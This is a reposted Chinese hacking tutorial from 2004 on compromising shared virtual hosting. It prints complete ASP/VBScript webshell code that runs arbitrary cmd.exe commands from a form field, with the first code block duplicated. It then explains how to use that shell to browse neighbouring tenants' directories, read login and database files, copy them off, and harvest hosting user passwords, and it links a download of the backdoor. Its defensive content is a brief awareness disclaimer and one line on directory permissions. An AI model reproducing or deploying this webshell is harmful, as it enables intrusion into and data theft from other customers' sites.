入侵虚拟主机的简单方案
来源:百度文库 编辑:神马文学网 时间:2024/04/26 14:54:36
来源:紫龙 作者: 类别:黑客教学 日期:2004-10-14 23:43:19 今日/总浏览: 2/475
下午突然的一个想法,就是利用一个ASP程序(1K多点)来攻破整个虚拟主机,照着自己的想法居然真的能突破虚拟主机,不过又多了一份担心,如果真的这样,那网络岂不是又无安宁之日了。先让大家看这个ASP的程序:
<%@ Language=VBScript %>
<%
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
下午突然的一个想法,就是利用一个ASP程序(1K多点)来攻破整个虚拟主机,照着自己的想法居然真的能突破虚拟主机,不过又多了一份担心,如果真的这样,那网络岂不是又无安宁之日了。先让大家看这个ASP的程序:
<%@ Language=VBScript %>
<%
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<%
If (IsObject(oFile)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
对于搞编程的人来说,这个根本不算难,只不过是一个小小的后门程序而已。但是否想过这个的功能呢?让我说下自己的一些思路吧!
比如你买了一个空间,只是一个虚拟主机的空间而已,也许上面有30个网站,更或者说是50个,甚至更多。如果你把上面这个文件传到空间的一个目录上,然后再到浏览器上执行,你会发现它有本地执行cmd.exe的功能,当然我指的是一般用户的功能。一般情况下,虚拟主机中会保留这样一个备份文件user.txt,里面包括了一些空间用户的资料以及密码,可以说这个都是人们习惯了。就算你没有,当然我也可以得到一切的一切,暂且让我称自己的空间为A吧,然后我要看到了空间B上有好多好多东西,那我就可以直接通过dir命令查找,也许你无意中会发现一个login.asp的文件,不烦用type的命令打开看看吧!哦,一层一层的推过去,很方便的就可以查看到了你想要的数据库文件。再或者这样吧,COPY命令说大多搞计算机的人都会用吧,你也可以把他的文件拷贝到你空间的目录上,然后再下载到本地慢慢看。还有很多的命令那就等着你自己去慢慢的摸索吧,就算是得到主机的用户密码也不再算是困难了。
特别提醒的是论坛,只要在论坛里添加一个可以上传ASP的选项目,这个主机也就可以用上述的方法入侵了。请各大论坛引起注意。
我把这个思想写出来,并不是叫大家去搞这些主机,而是想让广大用户引起注意。由于参照这篇文章而导致的后果与作者无关。上面提到的这个ASP后门程序可以http://www.qiker.com/down/cmdasp.rar<;/P>现在想到的防范方法只有限制目录权限
_xyz
入侵虚拟主机的简单方案
虚拟主机IIS防范入侵常见问答
简单局域网入侵
简单入侵1
最简单的入侵方法——知道对方IP就能入侵别人的电脑
最简单的入侵方法——知道对方IP就能入侵别人的电脑
最简单的入侵方法——知道对方IP就能入侵别人的电脑
最简单的入侵——知道对方IP就能入侵别人的电脑
最简单的入侵方法——知道对方IP就能入侵别人的电脑
关于允许匿名登陆的主机的简单入侵
关于允许匿名登陆的主机的简单入侵
关于允许匿名登陆的主机的简单入侵
教你最菜的最简单的入侵
最简单的入侵方法-别人的电脑
Vmware--虚拟主机的利器
系统安全防范之Linux下简单的入侵检测
入侵电脑就这么简单 - wj&的日志 - 网易博客
虚拟主机
入侵电脑就这么简单
入侵电脑就这么简单
入侵电脑就这么简单
入侵电脑就这么简单
最简单的入侵方法——知道对方IP就能入侵别人的电脑1
简单实用的网吧服务器配置方案